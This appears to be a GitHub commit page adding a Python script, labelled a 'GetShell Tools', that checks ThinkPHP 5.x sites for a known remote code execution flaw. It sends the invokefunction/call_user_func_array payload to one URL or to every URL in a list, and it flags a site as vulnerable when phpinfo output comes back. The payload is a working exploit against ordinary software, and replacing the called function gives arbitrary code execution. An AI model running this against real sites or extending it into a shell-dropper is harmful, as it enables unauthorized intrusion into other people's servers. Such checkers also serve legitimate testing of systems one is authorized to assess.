Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@rggu2zr
rggu2zr authored Dec 17, 2018
1 parent 8a1a781 commit 9e24d73
Showing 1 changed file with 39 additions and 0 deletions.
39 changes: 39 additions & 0 deletions ThinkPHP/ThinkPHP_5.X_远程代码执行漏洞/Thinkphp_check.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# GetShell Tools author: Bearcat

import sys
import requests

def send_payload(target):
payload = [r"/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"]
targets = target + payload[0]
header_list = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
}

try:
request = requests.get(target)
if request.status_code == 404:
print "[-] 404 not found " + target
else:
results = requests.get(targets,headers=header_list,timeout=3).text
r = requests.get(targets,verify=False,timeout=6).text
if 'PHP Version' in r:
print "[+] exists " + target
else:
print "[-] don't exists " + target
except requests.ConnectionError:
print "[-] Cannot connect url " + target

def read_url_list(files):
for line in open(files):
send_payload(line[:-1])

if __name__ == '__main__':
print "\n[*] Start Check...\n"
if sys.argv[1] == "-u":
send_payload(sys.argv[2])
elif sys.argv[1] == "-f":
file = sys.argv[2]
read_url_list(file)

0 comments on commit 9e24d73

Please sign in to comment.